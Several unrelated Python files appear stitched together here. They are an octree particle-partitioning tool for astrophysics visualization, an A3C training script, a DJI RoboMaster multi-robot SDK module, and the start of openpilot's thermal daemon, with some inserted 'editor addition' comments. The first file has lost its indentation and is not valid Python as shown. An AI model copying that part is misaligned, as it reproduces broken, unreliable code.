cx = self.nodes[parentIndex]['x'] - self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] + self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] - self.nodes[parentIndex]['width']/4.
n6, index6 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'6', width=self.nodes[parentIndex]['width']/2.)
n7, index7 = self.getNodeByID(self.nodes[parentIndex]['id']+'7')
if (n7 is None):
cx = self.nodes[parentIndex]['x'] + self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] - self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] - self.nodes[parentIndex]['width']/4.
n7, index7 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'7', width=self.nodes[parentIndex]['width']/2.)
n8, index8 = self.getNodeByID(self.nodes[parentIndex]['id']+'8')
if (n8 is None):
cx = self.nodes[parentIndex]['x'] - self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] - self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] - self.nodes[parentIndex]['width']/4.
n8, index8 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'8', width=self.nodes[parentIndex]['width']/2.)
childIndices = np.array([], dtype='int')
#for i, n in enumerate([n1, n2, n3, n4, n5, n6, n7, n8]):
for i, n in enumerate([index1, index2, index3, index4, index5, index6, index7, index8]):
#add the parent and child indices to the nodes
self.nodes[n]['parentNodes'] = self.nodes[parentIndex]['parentNodes'] + [parentIndex]
childIndex = n #the child node was already created above, so its index in self.nodes is n
self.nodes[parentIndex]['childNodes'] += [childIndex]
#create these so that I can divide up the parent particles
if (i == 0):
childPositions = np.array([[self.nodes[n]['x'],self.nodes[n]['y'],self.nodes[n]['z']]])
else:
childPositions = np.append(childPositions, [[self.nodes[n]['x'],self.nodes[n]['y'],self.nodes[n]['z']]], axis=0)
childIndices = np.append(childIndices, childIndex)
#divide up the particles
for p in self.nodes[parentIndex]['particles']:
child, index = self.findClosestNode(np.array(p), parentIndex=parentIndex)
self.nodes[index]['particles'] += [p]
self.nodes[index]['Nparticles'] += 1
#check how many particles ended up in each child node
# if (self.managerDict['verbose'] > 0):
# for i, n in enumerate([n1, n2, n3, n4, n5, n6, n7, n8]):
# print(' Child node, Nparticles', n['id'], n['Nparticles'])
# self.checkNodeParticles(node=n)
#remove the particles from the parent
self.nodes[parentIndex]['particles'] = []
self.nodes[parentIndex]['Nparticles'] = 0
#check if we need to remove a file
nodeFile = os.path.join(self.managerDict['path'], self.nodes[parentIndex]['id'] + '.csv')
if (os.path.exists(nodeFile)):
os.remove(nodeFile)
if (self.managerDict['verbose'] > 0):
print('removing file', nodeFile)
def dumpNodesToFiles(self):
#dump all the nodes to files
if (self.managerDict['verbose'] > 0):
print('dumping nodes to files ...')
#individual nodes
for node in self.nodes:
print('checking node for file', node['Nparticles'], node['needsUpdate'], len(node['particles']))
if ( (node['Nparticles'] > 0) and ('particles' in node) and (node['needsUpdate'])):
parts = np.array(node['particles'])
nodeFile = os.path.join(self.managerDict['path'], node['id'] + '.csv')
fmt = ''
header = ''
for key in self.managerDict['keyList']:
if (key == 'Coordinates'):
fmt += '%.8e,%.8e,%.8e,'
header +='x,y,z,'
elif(key == 'Velocities'):
fmt += '%.8e,%.8e,%.8e,'
header +='vx,vy,vz,'
else:
fmt += '%.8e,'
header += key + ','
fmt = fmt[:-1] #remove the last ','
header = header[:-1] #remove the last ','
mode = 'w'
if (os.path.exists(nodeFile)):
mode = 'a'
header = ''
print('WRITING FILE', nodeFile)
with open(nodeFile, mode) as f:
np.savetxt(nodeFile, parts, fmt=fmt, header=header, comments='')
node['particles'] = []
node['needsUpdate'] = False
if (self.managerDict['verbose'] > 1):
print('writing node to file ', node['id'], mode)
#node dict
with open(os.path.join(self.managerDict['path'], 'octree.json'), 'w') as f:
json.dump(list(self.nodes), f, cls=npEncoder)
self.managerDict['count'] = 0
def checkNodeParticles(self, node=None, iden=None, index=None):
if (index is not None):
node = self.nodes[index]
if (index is None and iden is not None):
node, index = self.getNodeByID(iden)
if (index is not None):
center = [self.nodes[index]['x'], self.nodes[index]['y'], self.nodes[index]['z']]
print(' checking node...')
print(' width = ', self.nodes[index]['width'])
print(' Nparticles = ', self.nodes[index]['Nparticles'])
print(' center = ',center)
if (self.nodes[index]['Nparticles'] > 0):
if (self.nodes[index]['particles'] == [] and self.nodes[index]['Nparticles'] > 0):
self.populateNodeFromFile(index)
#get the mean position of the particles and the max width
parts = np.array(self.nodes[index]['particles'])[:,0:3]
meanPosition = np.mean(parts, axis=0)
maxPosition = np.max(parts, axis=0)
minPosition = np.min(parts, axis=0)
dist2 = np.sum((parts - np.array([center]))**2, axis=1)
width = np.max(np.sqrt(dist2))
hi = maxPosition - np.array(center)
lo = np.array(center) - minPosition
width_linear = np.max(hi - lo)
print(' mean particle position = ', meanPosition)
print(' max particle position = ', maxPosition)
print(' min particle position = ', minPosition)
print(' max distance for particle positions = ', maxPosition - minPosition)
print(' width of particles', width, width_linear)
if (width > self.nodes[index]['width']):
print(' !!!! WARNING, particles are outside width of node')
wAll = np.sqrt(dist2)
outside = np.where(wAll > self.nodes[index]['width'])[0]
outside_pick = outside[0]
#check if there is a closer node... and if not, why not!!??
for i,n in enumerate(self.nodes):
if (i == 0):
allPositions = np.array([[n['x'], n['y'], n['z']]])
else:
allPositions = np.append(allPositions, [[n['x'], n['y'], n['z']]], axis=0)
p = np.array([parts[outside_pick]])[:,0:3]
dist2 = np.sum((allPositions - p)**2., axis=1)
print(' checking this particle',p)
print(' min distance to all, base nodes',min(dist2)**0.5)
else:
print('Please specify a node or node id on input')
def getNodeByID(self, iden):
node = None
index = 0
for i,n in enumerate(self.nodes):
if (n['id'] == iden):
node = n
index = i
break
return node, index
def checkNodeFiles(self):
#check to make sure that only the nodes with Nparticles > 0 have files
Nerror = 0
if (len(self.nodes) == 0):
print('Please compile the octree first')
return
#first get names of all expected files
names = []
Nparts = []
for n in self.nodes:
if (n['Nparticles'] > 0):
names.append(n['id'] + '.csv')
Nparts.append(n['Nparticles'])
avail = os.listdir(self.managerDict['path'])
#now check the list of available files
for fname in avail:
if ( (fname not in names) and (fname != 'octree.json')):
print('!!!WARNING: this file should not exist', fname)
Nerror += 1
#now check that all expected files exist
for i, name in enumerate(names):
if (name not in avail):
print('!!!WARNING: this file does not exist', name, Nparts[i])
Nerror += 1
print('Number of bad files = ', Nerror)
print('maximum number of particles in a file = ', max(Nparts))
print('minimum number of particles in a file = ', min(Nparts))
def populateAllNodesFromFiles(self, read = True):
Nparts = 0
#read in the octree from the json file
if (read):
with open(os.path.join(self.managerDict['path'],'octree.json')) as f:
self.nodes = json.load(f)
NbaseNodes = 0
for index, node in enumerate(self.nodes):
if (node['Nparticles'] > 0):
Nparts += node['Nparticles']
NbaseNodes += 1
self.populateNodeFromFile(index)
print('Populated octree from files.')
print(' -- total number of particles = ', Nparts)
print(' -- total number of nodes = ', len(self.nodes))
print(' -- total number of base nodes = ', NbaseNodes)
def populateNodeFromFile(self, index):
nodeFile = os.path.join(self.managerDict['path'], self.nodes[index]['id'] + '.csv')
if (self.managerDict['verbose'] > 1):
print('reading in file', nodeFile)
parts = np.genfromtxt(nodeFile, delimiter=',', skip_header=1).tolist()
self.nodes[index]['particles'] += parts
self.nodes[index]['Nparticles'] = len(self.nodes[index]['particles'])
self.nodes[index]['needsUpdate'] = True
self.managerDict['count'] += self.nodes[index]['Nparticles']
def shuffleAllParticlesInFiles(self):
if (self.managerDict['verbose'] > 0):
print('randomizing particle order in data files ... ')
#read in the octree from the json file
with open(os.path.join(self.managerDict['path'],'octree.json')) as f:
self.nodes = json.load(f)
for node in self.nodes:
if (node['Nparticles'] > 0):
nodeFile = os.path.join(self.managerDict['path'], node['id'] + '.csv')
if (self.managerDict['verbose'] > 1):
print(nodeFile)
lines = open(nodeFile).readlines()
header = lines[0]
parts = lines[1:]
random.shuffle(parts)
lines = [header] + parts
open(nodeFile, 'w').writelines(lines)
def getSizeCenter(self, inputFile=None):
#It will be easiest if we can get the center and the size at the start. This will create overhead to read in the entire file...
if (self.managerDict['verbose'] > 0):
print('calculating center and size ... ')
if (inputFile is None):
inputFile = self.managerDict['inputFile']
#open the input file
if (self.managerDict['delim'] is None):
#assume this is a hdf5 file
file = h5py.File(os.path.abspath(inputFile), 'r')
arr = file
if (self.managerDict['h5PartKey'] != ''):
arr = arr[self.managerDict['h5PartKey']]
arr = np.array(arr[self.managerDict['keyList'][0]]) #Coordinates are always first
if (self.managerDict['center'] is None):
self.managerDict['center'] = np.mean(arr, axis=0)
maxPos = np.max(arr - self.managerDict['center'], axis=0)
minPos = np.min(arr - self.managerDict['center'], axis=0)
self.managerDict['width'] = 2.*np.max(np.abs(np.append(maxPos,minPos)))
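# Added note: width is the edge length of the smallest axis-aligned cube, centered on
# 'center', that encloses every particle (twice the largest absolute offset along any axis).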
else:
#for text files
file = open(os.path.abspath(inputFile), 'r') #abspath converts to windows format
self.iterFileCenter(file)
file.close()
if (self.managerDict['verbose'] > 0):
print('have initial center and size', self.managerDict['center'], self.managerDict['width'])
def iterFileCenter(self, file):
#set up the variables
#center = np.array([0.,0.,0.])
maxPos = np.array([0., 0., 0.])
minPos = np.array([0., 0., 0.])
#begin the loop to read the file line-by-line
self.managerDict['lineN'] = 0
center = np.array([0., 0., 0.])
for line in file:
self.managerDict['lineN'] += 1
if (self.managerDict['lineN'] >= self.managerDict['header']):
#get the x,y,z from the line
point = line.strip().split(self.managerDict['delim'])
coordIndices = self.managerDict['colIndices']['Coordinates']
x = float(point[coordIndices[0]])
y = float(point[coordIndices[1]])
z = float(point[coordIndices[2]])
center += np.array([x,y,z])
maxPos[0] = max([maxPos[0],x])
maxPos[1] = max([maxPos[1],y])
maxPos[2] = max([maxPos[2],z])
minPos[0] = min([minPos[0],x])
minPos[1] = min([minPos[1],y])
minPos[2] = min([minPos[2],z])
if (self.managerDict['verbose'] > 0 and (self.managerDict['lineN'] % 100000 == 0)):
print('line : ', self.managerDict['lineN'])
if (self.managerDict['lineN'] > (self.managerDict['Nmax'] - self.managerDict['header'] - 1)):
break
if (self.managerDict['center'] is None):
self.managerDict['center'] = center/(self.managerDict['lineN'] - self.managerDict['header'])
#self.managerDict['center'] = (maxPos + minPos)/2.
maxPos -= self.managerDict['center']
minPos -= self.managerDict['center']
self.managerDict['width'] = 2.*np.max(np.abs(np.append(maxPos, minPos)))
def initialize(self):
self.managerDict['count'] = 0
#create the output directory if needed
if (not os.path.exists(self.managerDict['path'])):
os.makedirs(self.managerDict['path'])
#remove the files in that directory
if (self.managerDict['cleanDir']):
for f in os.listdir(self.managerDict['path']):
os.remove(os.path.join(self.managerDict['path'], f))
#create the base node
(n, index) = self.createNode(self.managerDict['center'], '0', width=self.managerDict['width'])
#for some reason when running with multiprocessing, I need to return a value here. Maybe this is way to make python wait for this to complete before moving on?
return (n, index)
def addPointToOctree(self, point):
#find the node that it belongs in
node, index = self.findClosestNode(np.array(point))
if (self.managerDict['verbose'] > 2):
print('id, Nparticles', self.nodes[index]['id'], self.nodes[index]['Nparticles'], point)
#add the particle to the node
self.nodes[index]['particles'] += [point]
self.nodes[index]['needsUpdate'] = True
self.nodes[index]['Nparticles'] += 1
if (self.managerDict['verbose'] > 2):
print('After, id, Nparticles', self.nodes[index]['id'], self.nodes[index]['Nparticles'])
#check if we need to split the node
if (node['Nparticles'] >= self.managerDict['NNodeMax'] and node['width'] >= self.managerDict['minWidth']*2):
self.createChildNodes(index)
def test(self, index):
print('BEFORE',self.nodes[index]['Nparticles'])
self.nodes[index]['Nparticles'] += 1
print('AFTER',self.nodes[index]['Nparticles'])
def compileOctree(self, inputFile=None, append=False):
#initialize a few things
if (not append):
#self.getSizeCenter()
self.managerDict['center'] = [0,0,0]
self.managerDict['width'] = 1000
_ = self.initialize()
if (inputFile is None):
inputFile = self.managerDict['inputFile']
#open the input file
if (self.managerDict['delim'] is None):
#assume this is a hdf5 file
file = h5py.File(os.path.abspath(inputFile), 'r')
arr = file
if (self.managerDict['h5PartKey'] != ''):
arrPart = arr[self.managerDict['h5PartKey']]
#now build the particle array
for i, key in enumerate(self.managerDict['keyList']):
if (i == 0):
arr = np.array(arrPart[key]) #Coordinates are always first
else:
addOn = np.array(arrPart[key])
arrLen = 1
if (key == 'Velocities'): #requires special handling because it is a 2D array
arrLen = 3
arr = np.hstack((arr, np.reshape(addOn, (len(arr),arrLen))))
else:
#for text files
file = open(os.path.abspath(inputFile), 'r') #abspath converts to windows format
arr = file
self.managerDict['Nmax'] = min(self.managerDict['Nmax'], arr.shape[0])
self.iterFileOctree(arr)
# file.close()
# self.shuffleAllParticlesInFiles()
# print('done')
def iterFileOctree(self, arr):
#begin the loop to read the file line-by-line
iStart = self.managerDict['header'];
self.managerDict['lineN'] = iStart
while self.managerDict['lineN'] < self.managerDict['Nmax']:
jobs = []
for i in range(self.managerDict['Ncores']):
iEnd = int(np.floor(min(iStart + self.managerDict['NMemoryMax']/self.managerDict['Ncores'], self.managerDict['Nmax'])))
print(iStart, iEnd, self.managerDict['lineN'], arr.shape[0])
if (iStart >= iEnd):
break
j = Process(target=self.iterLinesOctree, args=(arr[iStart:iEnd], ))
#j = Process(target=self.test, args=(0,))
jobs.append(j)
iStart = iEnd
if (iEnd >= arr.shape[0]):
break
print('starting jobs', len(jobs), self.managerDict['lineN'], iEnd, self.managerDict['Nmax'])
for j in jobs:
j.start()
print('joining jobs')
for j in jobs:
j.join()
#for testing
self.managerDict['lineN'] = iEnd
#now dump to files
self.dumpNodesToFiles()
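# Added note: each pass above takes at most NMemoryMax points off the array, splits them into
# Ncores roughly equal slices, inserts each slice in its own Process, waits for all of them to
# join, and then flushes the touched nodes to disk before reading the next chunk.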
def iterLinesOctree(self, arr):
print("checking",arr.shape[0])
for i in range(arr.shape[0]):
line = arr[i]
self.managerDict['lineN'] += 1
self.managerDict['count'] += 1
#get the x,y,z from the line
if (self.managerDict['delim'] is None):
point = line
else:
lineStrip = line.strip().split(self.managerDict['delim'])
point = []
for key in self.managerDict['keyList']:
indices = self.managerDict['colIndices'][key]
if (type(indices) is not list):
indices = [indices]
for ii in indices:
point.append(float(lineStrip[ii]))
self.addPointToOctree(point)
if (self.managerDict['verbose'] > 0 and (self.managerDict['lineN'] % 1000 == 0)):
print('line : ', self.managerDict['lineN'])
if __name__ == '__main__':
oM1 = octreeStream('/Users/ageller/VISUALIZATIONS/FIREdata/m12i_res7100/snapdir_600/snapshot_600.0.hdf5',
h5PartKey = 'PartType0', keyList = ['Coordinates', 'Density', 'Velocities'],
NNodeMax = 10000, NMemoryMax = 5e4, Nmax=1e5, verbose=2, minWidth=1e-4,
cleanDir = True,
Ncores=4,
path='/Users/ageller/VISUALIZATIONS/octree_threejs_python/WebGL_octreePartition/src/data/junk/octreeNodes/Gas')
oM1.compileOctree()
|
train.py
|
import torch
import torch.multiprocessing as _mp
from core.argparser import parse_args
from core.helpers import initialize_model
from core.optimizer import GlobalAdam
from core.test import test
from core.train import train
from core.wrappers import wrap_environment
from os import environ
def main():
torch.manual_seed(123)
mp = _mp.get_context('spawn')
args = parse_args()
env = wrap_environment(args.environment, args.action_space)
global_model = initialize_model(env, args.environment, args.transfer)
if not args.force_cpu:
torch.cuda.manual_seed(123)
global_model.cuda()
global_model.share_memory()
global_optimizer = GlobalAdam(global_model.parameters(),
lr=args.learning_rate)
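# Note (descriptive comment, not in the original): this follows the usual A3C-style layout --
# the global model sits in shared memory, each worker process runs train() against it through
# the shared GlobalAdam optimizer, and one extra process runs test() for evaluation.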
processes = []
for rank in range(args.num_processes):
process = mp.Process(target=train,
args=(rank, global_model, global_optimizer, args))
process.start()
processes.append(process)
process = mp.Process(target=test, args=(env, global_model, args))
process.start()
processes.append(process)
for process in processes:
process.join()
if __name__ == '__main__':
environ['OMP_NUM_THREADS'] = '1'
main()
|
multi_robot.py
|
# -*-coding:utf-8-*-
# Copyright (c) 2020 DJI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import time
import random
import threading
from robomaster import protocol
from robomaster import conn
from robomaster import robot
from robomaster import client
from robomaster import config
from . import logger
from . import tool
from . import multi_group
from . import multi_module
ROBOT_ID = 0
ROBOT_OBJ = 1
CHASSIS_LEAD_MODE = 2
GIMBAL_LEAD_MODE = 1
FREE_MODE = 0
class MultiRobotBase(object):
def __init__(self):
self._robots_list = []
self._robots_num = 0
self._group_list = [] # [group1, group2, ...]
self._robot_ip_list = [] # [robot1_ip, robot2_ip, ...]
self._robots_dict = {} # key:id, value: robot obj
def __del__(self):
pass
def initialize(self, robot_num):
"""scan all robots and init its
:param num:
:return:
"""
self._robots_list = self._scan_multi_robot(robot_num)
if not self._robots_list:
logger.error("MultiRobotBase: initialize. No robot was found!")
raise Exception("No robot was found!")
self._robots_num = len(self._robots_list)
for robot_obj in self._robots_list:
robot_obj.initialize()
def close(self):
for robot_obj in self._robots_list:
robot_obj.close()
@property
def all_robots(self):
return self._robots_list
@property
def robots_num(self):
return len(self._robots_list)
@property
def groups_num(self):
return len(self._group_list)
def _scan_multi_robot(self, num=0):
"""Automatic scanning of robots in the network
:param num:
:return:
"""
pass
def reset_all_robot(self):
for robot_obj in self._robots_list:
robot_obj.reset()
def number_id_by_sn(self, *args):
"""number id by SN
:param args: [id, SN] id int, SN str
:return:
"""
robots_sn_dict = tool.get_robots_sn(self._robots_list)
for robot_id, robot_sn in args:
if robot_sn not in robots_sn_dict.keys():
raise Exception("Robot SN {0} is not exist!".format(robot_sn))
elif robot_id in self._robots_dict.keys():
raise Exception("Id {0} cannot be reused!".format(robot_id))
elif robot_sn in self._robots_dict.values():
raise Exception("SN {0} has been numbered!".format(robot_sn))
self._robots_dict[robot_id] = robots_sn_dict[robot_sn]
logger.info("MultiRobot: number id by sn successfully")
self._robots_num = len(self._robots_dict)
return self._robots_num
def build_group(self, robot_id_list):
"""build a group that contains input robots
:param robot_list:
:return:
"""
pass
def remove_group(self, group_list):
""" remove group from MultiRobot obj
:param group_list:
:return:
"""
for group in group_list:
if group not in self._group_list:
logger.warning("MultiRobotBase group {0} do not exist".format(
group._robots_id_in_group_list))
else:
self._group_list.remove(group)
logger.info("MultiRobotBase: group {0} has removed".format(
group._robots_id_in_group_list))
def run(self, *exec_list):
"""Execute the action from the input list
:param exec_list: [robot_group, action_task]...
:return:
"""
_groups_exec_dict = {} # key: robot_group obj, value: execute thread
logger.info("MultiRobot: run exec_list: {0}".format(exec_list))
        if not isinstance(exec_list, tuple):
            exec_list = tuple(exec_list)
            logger.info(
                "MultiRobot: run, converted exec_list to tuple: {0}".format(exec_list))
for robot_group, group_task in exec_list:
if robot_group not in self._group_list:
                raise Exception("Input group {0} is not built".format(robot_group))
exec_thread = threading.Thread(target=group_task, args=(robot_group,))
exec_thread.start()
_groups_exec_dict[robot_group] = exec_thread
for robot_group, exec_thread in _groups_exec_dict.items():
exec_thread.join()
logger.info("MultiRobotBase: run, Action is completed")
class MultiEP(MultiRobotBase):
""" S1_EP"""
def __init__(self):
super().__init__()
def initialize(self, proto_type=config.DEFAULT_PROTO_TYPE):
"""scan all robots and init its
:param num:
:return:
"""
self._robots_list = self._scan_multi_robot(proto_type)
if not self._robots_list:
logger.error("MultiRobotBase: initialize. No robot was found!")
raise Exception("No robot was found!")
self._robots_num = len(self._robots_list)
for robot_obj in self._robots_list:
robot_obj.initialize(proto_type)
def _scan_multi_robot(self, proto_type=config.DEFAULT_PROTO_TYPE):
""" Automatic scanning of robots in the network
:return:
"""
robot_list = []
ip_list = conn.scan_robot_ip_list(10)
for i, ip in enumerate(ip_list):
sdk_conn = conn.SdkConnection()
proxy_addr = (ip, config.ROBOT_PROXY_PORT)
proto = protocol.ProtoSetSdkConnection()
proto._connection = 1
proto._host = protocol.host2byte(9, 6)
if config.LOCAL_IP_STR:
proto._ip = config.LOCAL_IP_STR
else:
proto._ip = '0.0.0.0'
proto._port = random.randint(config.ROBOT_SDK_PORT_MIN, config.ROBOT_SDK_PORT_MAX)
msg = protocol.Msg(robot.ROBOT_DEFAULT_HOST, protocol.host2byte(9, 0), proto)
result, local_ip = sdk_conn.switch_remote_route(msg, proxy_addr)
proto._ip = local_ip
logger.info("request connection ip:{0} port:{1}".format(proto._ip, proto._port))
if result:
conn1 = conn.Connection((proto._ip, proto._port), (ip, config.ROBOT_DEVICE_PORT),
protocol=proto_type)
logger.info("connection {0}".format(conn1))
cli = client.Client(9, 6, conn1)
rob = robot.Robot(cli)
robot_list.append(rob)
return robot_list
def build_group(self, robot_id_list):
"""build a group that contains input robots
:param robot_id_list:
:return:
"""
check_result, robot_id = tool.check_robots_id(robot_id_list, self._robots_dict)
if not check_result:
raise Exception("Robot Id %d is not exist" % robot_id)
robot_group = multi_group.RMGroup(robot_id_list, self._robots_dict)
robot_group.initialize()
self._group_list.append(robot_group)
logger.info("MultiRobot: build_group successfully, group.robots_in_group_list : {0}".format(
robot_group._robots_id_in_group_list))
return robot_group
def set_all_robots_mode(self, mode="gimbal_lead"):
"""
:param mode: free, gimbal_lead, chassis_lead
:return:
"""
all_result = True
for robot_id, robot_obj in self._robots_dict.items():
result = robot_obj.set_robot_mode(mode)
all_result = result and all_result
if not result:
print("Id %s : Set robot mode failed" % robot_id)
else:
print("Mode setup for all robots was successful")
return all_result
def number_id(self):
"""Manually number of all the robots entered at initialization.
The program will block in this function before the numbering is completed
return: the number of successful cars
"""
robot_id = 0
for robot_obj in self._robots_list:
self._robots_dict[robot_id] = robot_obj
self._number_prompt(robot_id, robot_obj)
robot_id += 1
return robot_id
class MultiDrone(MultiRobotBase):
def __init__(self):
self.robot_num = 0
self._client = tool.TelloClient()
self.tello_action = None
self._robot_host_list = []
self._group_list = []
self._robot_id_dict = {}
self._robot_sn_dict = {}
self._robot_host_dict = {}
def initialize(self, robot_num=0):
self.robot_num = robot_num
self._client.start()
self._robot_host_list = self._client.scan_multi_robot(robot_num)
def close(self):
self._client.close()
def _scan_multi_robot(self, num=0):
self.initialize(num)
_robot_ip_list = [host[0] for host in self._robot_host_list]
return _robot_ip_list
@staticmethod
def reset_all_robot():
logger.warning("Drone obj does not support this api \napi name:{}\napi location:{}"
.format(sys._getframe().f_code.co_name, sys._getframe().f_lineno))
@staticmethod
def all_robots():
logger.warning("Drone obj does not support this api \napi name:{}\napi location:{}"
.format(sys._getframe().f_code.co_name, sys._getframe().f_lineno))
@property
def robots_num(self):
return len(self._robot_host_list)
def run(self, *exec_list):
_groups_exec_dict = {}
robot_group_host_list = []
for robot_group, group_task in exec_list:
if robot_group not in self._group_list:
                raise Exception("Input group {0} is not built".format(robot_group))
self.tello_action = multi_module.TelloAction(self._client, self._robot_id_dict, self._robot_sn_dict,
self._robot_host_dict)
exec_thread = threading.Thread(target=group_task, args=(self.tello_action.action_group(robot_group),))
_groups_exec_dict[robot_group] = exec_thread
robot_group_host_list.append(robot_group.robot_group_host_list)
            # don't allow the same drone to run in different groups
result = tool.check_group_host(robot_group_host_list)
if result is False:
                # TODO BUG: number_id_to_all_drone can, with low probability, assign the same id twice within a single group
raise Exception("different running groups has same id")
for robot_group, exec_thread in _groups_exec_dict.items():
            # TODO: synchronization between multiple tasks still needs to be added
exec_thread.start()
for robot_group, exec_thread in _groups_exec_dict.items():
exec_thread.join()
logger.info("MultiRobotBase: run, Action is completed")
def build_group(self, robot_id_group_list):
check_result, robot_id = tool.check_robots_id(robot_id_group_list, self._robot_id_dict)
if not check_result:
raise Exception("Robot Id %d is not exist" % robot_id)
tello_groups = multi_group.TelloGroup(self._client, robot_id_group_list,
self._robot_id_dict, self._robot_sn_dict)
self._group_list.append(tello_groups)
return tello_groups
def send_command(self, text, host_list=None):
if host_list is None:
host_list = self._robot_host_list
for host in host_list:
proto = tool.TelloProtocol(text, host)
self._client.send(proto)
def _get_sn(self, timeout=0):
self.send_command("sn?")
cur_time = time.time()
while self._client.queue.qsize() < self.robot_num:
if time.time() - cur_time > timeout:
raise Exception("get sn timeout")
while not self._client.queue.empty():
proto = self._client.queue.get()
if proto.text is None:
raise Exception("recv data is None")
self._robot_sn_dict[proto.text] = proto.host # find host by sn
time.sleep(0.1) # Tello BUG that reply ok in sn? command response
return self._robot_sn_dict
def number_id_by_sn(self, *id_sn: list, timeout=3):
if not isinstance(id_sn, tuple) and not isinstance(id_sn, list):
raise Exception("input type must be list or tuple")
self._get_sn(timeout)
for id_, sn in id_sn:
host = self._robot_sn_dict.get(sn, None)
if host is None:
raise Exception("Tello {} does not exits".format(sn))
if self._robot_id_dict.get(id_, None) is not None:
                # a single id corresponds to a single sn
                raise Exception("id: {} has already been assigned".format(id_))
self._robot_id_dict[id_] = sn # find sn by id
self._robot_host_dict[host] = [id_] # find id by host
def number_id_to_all_drone(self, timeout=10):
        # Number all drones discovered by self.initialize(), assigning ids from 0 upward
self._get_sn(timeout)
for id_, item in enumerate(self._robot_sn_dict.items()):
sn, host = item
self._robot_id_dict[id_] = sn # find sn by id
self._robot_host_dict[host] = [id_] # find id by host
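# Illustrative usage sketch (editor addition, not part of the SDK): how the classes above
# are typically wired together. The serial numbers are hypothetical placeholders, and the
# body of the group task is left empty because the RMGroup proxy API lives in other modules.
def _example_multi_ep_usage():
    multi_robots = MultiEP()
    multi_robots.initialize()
    # Give each discovered robot a stable id keyed by its SN (placeholder SNs).
    multi_robots.number_id_by_sn([0, "3JKDH2T001XXXX"], [1, "3JKDH2T001YYYY"])
    group_all = multi_robots.build_group([0, 1])

    def group_task(robot_group):
        # Drive the robots in this group through the group's proxy modules here.
        pass

    # run() accepts (group, task) pairs and executes each task in its own thread.
    multi_robots.run([group_all, group_task])
    multi_robots.close()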
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.hardware import EON, HARDWARE, PC, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import EonFanController, UnoFanController, TiciFanController
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5 if TICI else 70.0
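# Illustrative sketch (editor addition, not part of the original daemon): the hysteresis
# rule described above, mirroring the band-transition step inside thermald_thread below.
# The status only changes when the filtered temperature leaves the current band.
def _example_next_thermal_status(current_status, max_comp_temp):
  band = THERMAL_BANDS[current_status]
  band_idx = list(THERMAL_BANDS.keys()).index(current_status)
  if band.min_temp is not None and max_comp_temp < band.min_temp:
    return list(THERMAL_BANDS.keys())[band_idx - 1]  # cooled below the band: step down
  if band.max_temp is not None and max_comp_temp > band.max_temp:
    return list(THERMAL_BANDS.keys())[band_idx + 1]  # exceeded the band: step up
  return current_status  # still inside the band: unchanged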
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
global tz_by_type
tz_by_type = {}
for n in os.listdir("/sys/devices/virtual/thermal"):
if not n.startswith("thermal_zone"):
continue
with open(os.path.join("/sys/devices/virtual/thermal", n, "type")) as f:
tz_by_type[f.read().strip()] = int(n.lstrip("thermal_zone"))
def read_tz(x):
if x is None:
return 0
if isinstance(x, str):
if tz_by_type is None:
populate_tz_by_type()
x = tz_by_type[x]
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
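# Illustrative sketch (editor addition): read_tz accepts either a numeric thermal-zone
# index or a zone type string; string lookups are resolved through the tz_by_type cache
# populated above. The zone name here is a hypothetical example, and the raw value still
# needs the per-device scaling applied in read_thermal below.
def _example_read_zone_temp():
  by_index = read_tz(0)                 # /sys/devices/virtual/thermal/thermal_zone0/temp
  by_name = read_tz("cpu0-silver-usr")  # hypothetical zone type string
  return by_index, by_name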
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
